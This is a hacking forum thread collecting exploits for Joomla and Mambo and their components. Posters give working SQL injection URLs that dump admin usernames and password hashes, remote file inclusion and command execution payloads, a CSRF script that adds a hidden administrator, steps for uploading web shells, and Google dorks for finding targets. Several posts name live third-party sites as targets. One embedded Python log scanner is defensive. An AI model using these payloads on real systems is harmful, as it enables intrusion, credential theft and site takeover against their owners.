View Full Version : Overview of vulnerabilities in the CMS [Joomla, Mambo] and their components
CMS Joomla!
I want to open this overview by saying that, however much Joomla is considered one of the most vulnerable CMSs, in my opinion Joomla is actually a pretty decent engine where security is concerned. The problem lies in the third-party components plugged into the engine and written by outside developers (not the Joomla developers). But thanks to those third-party components this CMS becomes interesting "from the inside" (in the administrator panel).
Access to the administrator panel:
Here I will touch on two vulnerabilities in Joomla that I found.
1. The SimpleFaq 2.x component (com_simplefaq) *
The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database.
The vulnerability exists due to insufficient sanitisation of input data in the aid parameter of the Joomla installation script index.php (when the "option" parameter is set to com_simplefaq and the task parameter is set to answer). A remote user can execute arbitrary SQL commands in the application's database with a specially crafted request. (c) securitylab.ru
* I later found out that this vulnerability had been discovered before me
Vulnerable versions: 2.x to 2.40
Appearance:
http://efots.info/images/10913601.gif
On the request:
http://victim.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0/**/from/**/jos_users/*
it politely returns the login, the hash (md5) and the e-mail:
http://efots.info/images/18549402.gif
Now it only remains to crack the hash and walk into the administrator panel.
In the same way you can get access to the MySQL database with the request:
http://victim.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,User,Password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mysql.user/*
And accordingly our dear browser will return the following:
http://efots.info/images/71574103.gif
2. The ReMOSitory 341RE component (com_remository) *
The vulnerability exists due to insufficient handling of files uploaded to the server, and direct access to them being available by default.
* I have not seen this vulnerability anywhere yet
Appearance:
http://efots.info/images/67777804.gif
Now we register and go to upload a file (in our case it's a shell))) via the "Add file" link
After the file is added it is automatically uploaded to a temporary store (/downloads/uploads/) pending the administrator's approval. But we won't wait; we follow the link http://victim.com/downloads/uploads/ and see the following:
http://efots.info/images/21416405.gif
We open it... And what follows is a completely different story, one that has been raised more than once on this forum.
The administrator panel.
So we have reached the intended goal, but getting here is not enough; you also need access to add/edit/delete files. There are two options for this:
1. In most cases (in my experience, 95 out of 100) the following folders are writable:
media/
administrator/components/
components/
images/stories/
administrator/modules/
modules/
language/
mambots/
And that's good! Now, without thinking twice, we go this way: Install/Uninstall => Components. And depending on what exactly is needed (and sometimes everything is needed), we install the following components:
JoomlaXplorer 2.0 – a sort of FTP server with the ability to set file permissions and to upload/edit/delete files. Screenshot:
http://efots.info/images/79943006.gif
Moreover, as you can see from the screenshot, it provides access not only to the site's directory but also, if other sites are hosted here, to those too)))
JoomlaPack 1.1.0 – a component for creating a data archive (DB backup and a full site backup with installation files)
http://efots.info/images/54737907.gif
Nothing complicated here: just follow the "Create site archive" link, choose what exactly to create (DB archive or site archive), create it, then follow the "Saved site archives" link and download it.
Now the site is under our watchful guidance)))
2. Using the shell to escalate to root privileges; on this possibility you can find many articles by following the link www.google.com
That's all. Liability for the use of this article is provided for by the Criminal Code of the Russian Federation. The thread was created for educational purposes.
JoomlaXplorer 2.0 – here (http://dump.ru/files/m/m4960353436/)
JoomlaPack 1.1.0 – here (http://dump.ru/files/m/m715618744/)
A collection of exploits for the Joomla! CMS and third-party components – here (http://dump.ru/files/m/m5557530211/) – exploits (c) milw0rm.com
P.S. And remember, whatever the hack, the main thing is that it be safe (c) Anfisa Chekhova
it's my (c) 2007
blackybr
06.10.2007, 13:26
=NO FLAMING=
To make it easier to understand: Joomla is basically the 5th version of Mambo, which they decided to renumber and rename.
As for finding out the version in the latest releases, that is a tricky question.
The CHANGELOG.php file can be viewed only by the admin; /includes/version.php is also not readable, it is only included into the admin-panel files; installation/index.php is usually deleted.
I'm looking at the older versions.
Many modules for Joomla/Mambo suffer from remote/local file inclusion.
All because the variable $mosConfig_absolute_path, which is included in practically every file, is never checked.
An exact list of modules and versions will be ready soon.
4.5.2.1
mysql >4.1 (uses subqueries)
Bug:
/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=1&user_rating=1,rating_sum=[sql]
Mambo 4.5.2.1 hash pass disclosure (http://milw0rm.com/exploits/1049)
Mambo 4.5.2.1 by RST (http://milw0rm.com/exploits/1061)
4.6rc1
A vulnerability in the com_frontpage module; uses character-by-character benchmark brute forcing of fields.
Mambo <= 4.6rc1 'Weblinks' blind SQL injection (http://milw0rm.com/exploits/1920)
1.0
RFI - http://targetsite.com/[path_to_Joomla!]/includes/joomla.php?includepath=[attacker]
(c) http://packetstormsecurity.org/0606-exploits/joomla10.txt
1.0.7
A vulnerability in the com_rss module that allows a DoS attack, path disclosure, and creating arbitrary files.
Mambo/Joomla Path Disclosure & Remote DOS Exploit (http://milw0rm.com/exploits/1698)
File creation: index.php?option=com_rss&feed=[file name]&no_html=1
Path: index.php?option=com_rss&feed=/&no_html=1
DoS: index.php?option=com_poll&task=results&id=1&mosmsg=DOS@HERE<<>AAA<><>
(c) bugs discovered by Foster (RST/GHC)
All of this is fixed in 1.0.8. Also, as far as I could see, in this version you can carry out an XSS attack via $mosmsg; the filter includes/phpInputFilter/class.inputfilter.php lets half the tags through.
1.0.9
A vulnerability in the com_frontpage module; uses character-by-character benchmark brute forcing of fields.
Joomla <= 1.0.9 'Weblinks' blind SQL injection (http://milw0rm.com/exploits/1922)
1.0.10
A vulnerability in com_poll that allows "inflating" one or another answer option
Joomla add unlimited votes (http://milw0rm.com/exploits/2219)
1.5.0
The vulnerability allows executing arbitrary commands on the server
PoC: http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?
Joomla! 1.5.0 Remote file include (http://milw0rm.com/exploits/3781)
1.5 - 1.5 beta 2
The vulnerability allows remote execution of commands on the server.
Vulnerable code:
1) components/com_search/views/search/tmpl/default_results.php
line 12: <?php eval ('echo "'. $this->result .'";'); ?>
2) templates/beez/html/com_search/search/default_results.php
line 25: echo '<p>' . eval ('echo "' . $this->result . '";');
PoC
http://$joomlahost/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
http://$joomlahost/index.php?c=id&searchword=";system($_GET[c]);%23&option=com_search&Itemid=1
Remote command execution in Joomla! CMS 1.5 beta 2 (http://milw0rm.com/exploits/4212)
1.5 beta 1,2 + RC1
The vulnerability is present in the com_content module in three files, archive.php, category.php and section.php, in the filter parameter.
Joomla! 1.5 Beta1/Beta2/RC1 Remote SQL Injection Exploit (http://milw0rm.com/exploits/4350)
All versions
./administration/ sql injection
http://packetstormsecurity.org/0707-exploits/joomla-sql.txt
PoC:
administrator/popups/pollwindow.php?pollid=1%20union%20select%20passwor d%20from%20jos_users/*
Path disclosure:
includes/Cache/Lite/Output.php
includes/patTemplate/patTemplate/Stat.php
includes/patTemplate/patTemplate/OutputFilter.php
includes/patTemplate/patTemplate/OutputCache.php
includes/patTemplate/patTemplate/Modifier.php
includes/patTemplate/patTemplate/Reader.php
includes/patTemplate/patTemplate/TemplateCache.php
Uploading a shell in the 1.5.* versions.
1. Log in to the admin panel http://joomla/administrator/
2. Go to the install/upgrade component
http://joomla/administrator/index.php?option=com_installer
3. Choose any file in Upload Package File and upload it =)
It will be located at http://joomla/tmp/
Includes in mods/modules/components
Updated: 12.01.2008
A small tool for automatically checking includes is attached.
added a script for removing duplicates and sorting alphabetically
sql in the guestbook (com_akobook module)
v. <=3.42
/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=[sql]
examples: (output in quotes)
http://www.raznyeludi.com/component/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*
http://games.etherway.ru/index.php?option=com_akobook&Itemid=91&func=sign&action=reply&gbid=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+from+information_schema.tabl es/*
etc.
ps for those who haven't noticed: /itemid,1/ = &itemid=1
VULN: /multithumb.php
BUG: include_once($mosConfig_absolute_path."/mambots/content/multithumb/class.img2thumb.inc");
(c) http://www.rootshell-team.com/showthread.php?t=2969
CBSMS Mambo Module <= 1.0 ([mosConfig_absolute_path])
# http://www.site.com/[path]/mod_cbsms_messages.php?mosConfig_absolute_path=[evil script]
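As a defender-side illustration of the request shapes described in this post (UNION SELECT with /**/ or %2F%2A%2A%2F as whitespace, references to jos_users/mos_users or the #__ prefix placeholder, mosConfig_absolute_path/mosConfig_live_site pointed at a URL, and a quote-terminated searchword for com_search), here is an added example, not code from any post in this thread: a small Python scanner that normalises the query string of Apache combined-format access-log lines and reports which patterns each request matches. The log lines and the 192.0.2.x/203.0.113.x addresses are constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Detection rules for the Joomla/Mambo request shapes this thread describes.
# Each regex runs against the decoded, comment-stripped query string.
RULES = [
    # UNION-based injection; /**/ and %2F%2A%2A%2F have already been folded to spaces
    ("sqli_union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    # direct reference to the user table or to the "#__" prefix placeholder
    ("sqli_user_table", re.compile(r"\b(?:jos|mos)_users\b|#__\w+", re.I)),
    # boolean/time-based blind injection (substring/benchmark probing)
    ("sqli_blind", re.compile(r"\band\b.*\b(?:substring|benchmark)\s*\(", re.I)),
    # register_globals RFI through the unchecked include variables
    ("rfi_mosconfig", re.compile(r"mosConfig_(?:absolute_path|live_site)=(?:https?|ftp):", re.I)),
    # com_search eval() breakout: searchword closes the string and starts PHP code
    ("rce_com_search", re.compile(r"searchword=[^&]*\";")),
]

# Apache combined log format: client ip, timestamp, request line, status (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_query(path: str) -> str:
    """Return the query string of a request path with percent-encoding and '+'
    decoded and SQL comments (/**/) replaced by a space, so that obfuscated
    and plain payloads look alike to the rules."""
    query = path.split("?", 1)[1] if "?" in path else ""
    decoded = unquote_plus(query)
    return re.sub(r"/\*.*?\*/", " ", decoded)


def scan_line(line: str):
    """Return (ip, path, [rule names]) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = normalise_query(m.group("path"))
    hits = [name for name, rx in RULES if rx.search(query)]
    if not hits:
        return None
    return m.group("ip"), m.group("path"), hits


def scan_log(lines):
    """Scan an iterable of log lines and return the list of findings."""
    findings = []
    for line in lines:
        result = scan_line(line)
        if result:
            findings.append(result)
    return findings


# Constructed sample log (not real traffic); 192.0.2.x/203.0.113.x are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Oct/2007:13:26:00 +0400] "GET /index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email/**/from/**/jos_users/* HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [06/Oct/2007:13:27:00 +0400] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://203.0.113.5/x.txt? HTTP/1.0" 200 311 "-" "curl/7.15"',
    '192.0.2.12 - - [06/Oct/2007:13:28:00 +0400] "GET /index.php?option=com_content&task=view&id=12&Itemid=1 HTTP/1.1" 200 18210 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [06/Oct/2007:13:29:00 +0400] "GET /index.php?searchword=%22;phpinfo();%23&option=com_search&Itemid=1 HTTP/1.1" 200 40960 "-" "Mozilla/5.0"',
    '192.0.2.14 - - [06/Oct/2007:13:30:00 +0400] "GET /index.php?option=polls&Itemid=0&pollid=26/**/and/**/substring((SELECT/**/1/**/from/**/%23__users),1,1)=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {','.join(hits)} {path}")
```

Only the benign com_content request in the sample passes without a finding; each of the other four lines is reported with the rule names it triggered.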
otmorozok428
06.11.2007, 11:07
How to find out the Joomla version?
The file configuration.php-dist sits in the root and describes itself like this:
* -------------------------------------------------------------------------
* THIS FILE SHOULD BE USED ONLY WHEN THE WEB INSTALLER CANNOT BE USED
*
* If you are installing Joomla manually, i.e. not using the web installer,
* then rename this file to configuration.php
*
* For example:
* UNIX -> mv configuration.php-dist configuration.php
* Windows -> rename configuration.php-dist configuration.php
*
* Now edit this file and set the parameters of your site
* and database.
* -------------------------------------------------------------------------
The problem, however, is that in 9 cases out of 10 people either forget to rename the file or simply don't see the need.
Examples of this
http://www.joomla.org/configuration.php-dist
http://www.joomla.ru/configuration.php-dist
Meanwhile, the file contains sensitive information that lets you find out the version of the installed package. So, if version 1.0.13 is installed, the file contains the line:
* @version $Id: configuration.php-dist 7424 2007-05-17 15:56:10Z robs $
versions 1.0.11, 1.0.12
* @version $Id: configuration.php-dist 4802 2006-08-28 16:18:33Z stingrey $
versions 1.0.9, 1.0.10
* @version $Id: configuration.php-dist 3754 2006-05-31 12:08:37Z stingrey $
version 1.0.8
* @version $Id: configuration.php-dist 2622 2006-02-26 04:16:09Z stingrey $
versions 1.0.5-1.0.7
* @version $Id: configuration.php-dist 506 2005-10-13 05:49:24Z stingrey $
version 1.0.4
* @version $Id: configuration.php-dist 217 2005-09-21 15:15:58Z stingrey $
version 1.0.3
* @version $Id: configuration.php-dist 506 2005-10-13 05:49:24Z stingrey $
versions 1.0.1, 1.0.2
* @version $Id: configuration.php-dist 217 2005-09-21 15:15:58Z stingrey $
version 1.0.0
* @version $Id: configuration.php-dist 47 2005-09-15 02:55:27Z rhuk $
A vulnerability in the site search, in the searchword parameter. The hole is a DOM-based XSS.
http://site/index.php?option=com_search&searchword=';alert('XSS')//
For the code to execute, the user has to change the number of search results per page.
vulnerable versions: Joomla! <= 1.0.13
BlackCats
13.11.2007, 04:33
and what about this:
* @version $Id: configuration.php-dist,v 1.4 2005/11/25 04:46:26 csouza Exp $
what version is it?
looks like 1.4, but the numbers bother me somehow; in the list above 2005\10 is already 1.5
otmorozok428
15.11.2007, 10:10
BlackCats, that's some Mambo you have there (not one of the latest)... As for the specific version, unfortunately I can't answer right now. For now I'm posting the data for
Joomla 1.5.x
1.5.0 Release Candidate 3
* @version $Id: configuration.php-dist 8946 2007-09-18 14:26:22Z louis $
1.5.0 Release Candidate 2
* @version $Id: configuration.php-dist 8290 2007-08-01 14:03:11Z jinx $
1.5.0 Release Candidate 1
* @version $Id: configuration.php-dist 7740 2007-06-13 21:01:25Z laurens $
1.5.0 Beta 2
* @version $Id: configuration.php-dist 6691 2007-02-21 09:29:26Z Jinx $
1.5.0 Beta
* @version $Id: configuration.php-dist 5361 2006-10-07 19:21:08Z Jinx $
Addendum to com_remository
stored XSS if comments can be left on files
xttp://localhost/index.php?option=com_remository&Itemid=30&func=fileinfo&id=4
and when uploading a file, PHP injection sometimes works
in the "Title:" field we write ";phpinfo();//"
<input class='inputbox' type='text' id='filetitle' name='filetitle' size='25' value='' />
Solide Snake
19.11.2007, 22:47
Joomla Component JUser 1.0.14 Remote File Inclusion Vulnerability (http://www.milw0rm.com/exploits/4636)
found it the day before yesterday, it seems it's not public
the com_joomradio component
google->inurl:com_joomradio inurl : option, only 452 in total, not many
http://poosk.fm/index2.php?option=com_joomradio&page=show_radio&id=4+and+1=0+union+select+1,concat(username,0x3a,p assword),3,4,5,6,7+from+jos_users+where+gid=25+or+ gid=24/*
milw0rm: Mambo/Joomla Component rsgallery <= 2.0b5 (catid) SQL Injection Vuln (http://milw0rm.com/exploits/4691)
As a follow-up I want to say that on Mambo the prefix is mos_, on Joomla jos_
Mambo:
index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd),6,7,8,9,10,11+from+mos_users--
Joomla:
index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd),6,7,8,9,10,11+from+jos_users--
Dork:
Google : "option=com_rsgallery" or inurl:"index.php?option=com_rsgallery"
XSS is found very often in Joomla, but there is a problem: the session lives for 30 minutes, so I wrote an active sniffer. First the sniffer tries to upload a shell; if it fails to upload a shell, a new admin is created
http://slil.ru/25290482
tested on Joomla 1.0.12
LIMBO CMS (Lite mambo)
Blind sql-inj
exploit: http://site/index.php?option=polls&Itemid=0&pollid=[id]/**/and/**/[subquery]
where [id] is a real existing poll id and [subquery] is a boolean expression
at the moment the tech support sites are vulnerable:
http://limbo-cms.com.ru/index.php?option=polls&Itemid=0&pollid=177/**/and/**/user()=0x746172656C6B615F61646D696E406C6F63616C686 F7374
http://www.limboportal.com/index.php?option=polls&Itemid=0&pollid=26/**/and/**/1=1
with a wrong variant the poll is not displayed; since by default the prefix is chosen randomly, instead of the prefix in the subquery's select you have to put %23__[table name] after FROM, where [table name] is the table name without the prefix, for example:
http://www.xtreme.kz/index.php?option=polls&Itemid=0&pollid=26/**/and/**/substring((SELECT/**/1/**/from/**/%23__users),1,1)=1
iJoomla Magazine
Blind sql-inj
exploit: http://site/index2.php?option=com_magazine&func=show_magazine&id=[id]+and+[subquery]
where [id] is a real existing page id and [subquery] is a boolean expression
at the moment the vendor's sites are vulnerable:
http://www.ijoomla.com/index2.php?option=com_magazine&func=show_magazine&id=7+and+substring((select+username+from+jos_users +limit+1,1),1,1)=0x21&Itemid=91
with a wrong variant a different page is displayed
P.S. Found it myself, so if it turns out to be old news, don't kick me too hard; it just means you have more information than I do
no need to worry about the prefix; anyone who has looked at the source may have noticed that the prefix is written as "#__", and then the string is passed to the setQuery function, which replaces "#__" with the right one; it will look like this: %23__users
Yes, you're right, though on the limbo-cms.com.ru site it doesn't work, I don't know why, but on other sites it does; then again, maybe we were looking at different versions: the query is passed not to setQuery but to the Execute function, which is what replaces #__ with the prefix
it works when the developers of third-party components use the standard Joomla functions for talking to the database; there are exceptions, but it works in 90% of cases
Solide Snake
01.01.2008, 04:44
//Exploit
http://server.com/Path/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password )%20from%20jos_users--
//Search text:
inurl:index.php?option=com_puarcade
inurl:/option,com_puarcade/
(c) (http://www.milw0rm.com)
com_serverstat (a Mambo & Joomla component)
/This component is used to display game server statistics/
The vulnerability allows a remote user to execute an arbitrary PHP script on the target system. The vulnerability exists due to insufficient sanitisation of input data in the "mosConfig_absolute_path" parameter in the template script administrator/components/com_serverstat/templates/template.game.php. A remote user can execute an arbitrary PHP script on the target system with the privileges of the web server. The variable passed via the GET request is used in an include. For successful exploitation the "register_globals" option must be enabled in the PHP configuration file.
Example:
http://[host]/administrator/components/com_serverstat/templates/template.game.php?mosConfig_absolute_path=[http://file]
...........................................
and also:
in the "mosConfig_absolute_path" parameter in the script administrator/components/com_serverstat/install.serverstat.php
Example:
http://[host]/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=[http://file]
_kREveDKo_
11.01.2008, 23:44
com_serverstat (a Mambo & Joomla component)
Well then let's also mention that there is a stored XSS there too, in the player nickname field. If there aren't enough characters for a full-fledged attack (I don't remember how many fit in a nick), you can end the nick like this: <!--, then join the game as another player with a nick beginning with --> and so on, until you run out of room...
Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.
<script type="text/javascript">
window.onload = function() {
var url = "http://joomlasite.com/joomla/administrator/index2.php";
var gid = 25;
var user = 'custom_username';
var pass = 'custom_password';
var email = 'joe_cool (at) example (dot) com [email concealed]';
var param = {
name: user,
username: user,
email: email,
password: pass,
password2: pass,
gid: gid,
block: 0,
option: 'com_users',
task: 'save',
sendEmail: 1
};
var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">
PS it adds a new admin with the given login, password and e-mail, in case anyone didn't get it...
Flash Component Multiple Remote File Inclusion
Vulnerable: 2.5.1, 2.5.2
Exploit:
http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_
flash_uploader.php?mosConfig_absolute_path=shell?
http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.jooml
a_flash_uploader.php?mosConfig_absolute_path=shell ?
Joomla Component NeoRecruit
SQL:
http://[site]/index.php?option=com_neorecruit&task=offer_view&id=[SQL injection]
Example:
http://www.sepangaircraft.com/index.php?option=com_neorecruit&task=offer_view&id=36985
2+UNION+SELECT+1,concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25+FROM+jos_users--
Joomla Component Nice Talk
SQL:
http://[site]/index.php?option=com_nicetalk&tagid=[SQL injection]
Example:
http://www.diariometropolitano.com/rmbs/index.php?option=com_nicetalk&tagid=-1)+UNION+
SELECT+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,p assword),12,13,14,15,16,17,18+FROM+jos_use
rs--
Joomla prefix jos_
Mambo prefix mos_
Remote File Inclusion
Vulnerable: com_panoramic version 1.0
PoC:
http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]
Remote File Inclusion
Vulnerable: MOSMediaLite451
PoC:
http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell]
http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell]
Solide Snake
30.01.2008, 18:57
Mambo Component Newsletter (listid) Remote SQL Injection
SQL Injection:
index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
To search, enter:
allinurl: "com_newsletter"
Mambo Component Fq (listid) Remote SQL Injection
SQL Injection:
index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
To search, enter:
allinurl: "com_fq"
Mambo Component MaMML (listid) Remote SQL Injection
SQL Injection:
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
To search, enter:
allinurl: "com_mamml"
Mambo Component Glossary 2.0 (catid) SQL Injection
SQL Injection:
index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8 ,9,10,11,12,13,14%20from%20mos_users-
To search, enter:
allinurl: "com_glossary"
(c) (http://www.hackturkiye.com/)
Solide Snake
31.01.2008, 02:15
Mambo Component musepoes (aid) Remote SQL Injection
SQL Injection:
index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0 x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
To search, enter:
allinurl: "com_musepoes"
Mambo Component buslicense (aid) Remote SQL Injection
SQL Injection:
index.php?option=com_buslicense§ionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,1 4/**/from/**/mos_users/*
To search, enter:
allinurl: "com_buslicense"
Mambo Component Recipes 1.00 (id) Remote SQL Injection
SQL Injection:
index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5 ,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username ,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*
To search, enter:
allinurl: "com_recipes"
Mambo Component jokes 1.0 (cat) SQL Injection
SQL Injection:
index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
To search, enter:
allinurl: "com_jokes"
Mambo Component EstateAgent 0.1 Remote SQL Injection
SQL Injection:
index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN
To search, enter:
allinurl: "com_estateagent"
(c) (http://www.hackturkiye.com/)
Component Catalogshop 1.0b1 SQL Injection Vulnerability
inurl: index.php?option=com_catalogshop
Injection: index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.uralmetall.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
Component AkoGallery 2.5b SQL Injection Vulnerability
inurl: index.php?option=com_akogallery
Injection:
index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+fr om+mos_users--
http://brodnica.com.pl/powiat/index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+fr om+mos_users--
(c) hackturkiye.com
Mr. P.S.
01.02.2008, 17:34
SQL injection in Mambo Component Restaurant
Program: Mambo Component Restaurant 1.0
The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database. The vulnerability exists due to insufficient sanitisation of input data in the "id" parameter by the index.php script. A remote user can execute arbitrary SQL commands in the application's database with a specially crafted request.
Example: index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/* */union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/* */from/**/mos_users/*
(c) (xakep.ru)
SQLi in Gary's Cookbook 2.3.4, I didn't look at other versions
google: inurl:option inurl:com_garyscookbook (251,000 in total)
POST http://localhost/joomla/index.php HTTP/1.0
Accept: */*
Referer: http://localhost/joomla/index.php?option=com_garyscookbook&Itemid=&func=detail&id=1
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Opera 9.95
Host: localhost
Content-Length: 95
Pragma: no-cache
option=com_garyscookbook&Itemid=&func=vote&imgvote=4&id=1,(select username from %23__users where gid=25 or gid=24 limit 1))%23
the query to the DB
INSERT INTO jos_gkb_voting_log (type,date,userid,fileid,ipaddress) VALUES ('3','2008-00-00 00:00:00', 0,[sql],'127.0.0.1');
the query results are not displayed anywhere
the only way to exploit it is character-by-character brute forcing
p.s. very painful, I didn't dig any further; if anyone manages to add an insert or update, please post back
Component NeoReferences 1.3.1 (catid) SQL Injection Vulnerability
inurl: index.php?option=com_neoreferences
Injection: index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.islamicamagazine.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
Mambo Component Mambads 1.5 Remote SQL Injection
inurl: index.php?option=com_mambads
Injection: index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500+union+select+null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, concat(username,0x3a,password),null,null,null,null ,null,null,null+from+mos_users--
http://www.vivalavida.org/index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500+union+select+null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, concat(username,0x3a,password),null,null,null,null ,null,null,null+from+mos_users--
(c) hackturkiye.com
Mambo Component SOBI2 RC 2.5.3 SQL Injection Vulnerability
PoC:
http://site.com/path/index.php?option=com_sobi2&Itemid=27&catid=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*
Mosets Hot Property v0.9.6
magic_quotes_gpc off
register_globals on
http://localhost/joomla/components/com_hotproperty/pdf.php?id=10'+and+1=0+union+select+1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(u sername,0x3a,password),1+from+%23__users+where+gid =25+or+gid=24+limit+1/*
KPOT_f!nd
04.02.2008, 04:34
Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability
/index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*
Search for the buggy component: inurl:index.php?option=com_directory
Author: aNa TrYaGi
Source: milw0rm.com [2008-02-03]
Mr. P.S.
04.02.2008, 19:15
Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit
Author: SoSo H H (Iraqi-Cracker)
Tested on: Markplace Version 1.1.1 and 1.1.1-pl1
Search for the buggy component:
"Marketplace Version 1.1.1"
"Marketplace Version 1.1.1-pl1"
inurl:index.php?option=com_marketplace
Exploit:index.php?option=com_marketplace&page=show_category&catid=(SQL)
Example: (SQL)=-1+union+select+concat(username,0x3a,password),2,3+ from+jos_users/*
milw0rm.com (http://milw0rm.com/exploits/5055) [2008-02-03]
----------------------------------------------------
HOME : http://www.hackturkiye.com/
AUTHOR : S@BUN :
joomla SQL Injection(com_awesom)
DORKS 1: allinurl :"com_awesom"
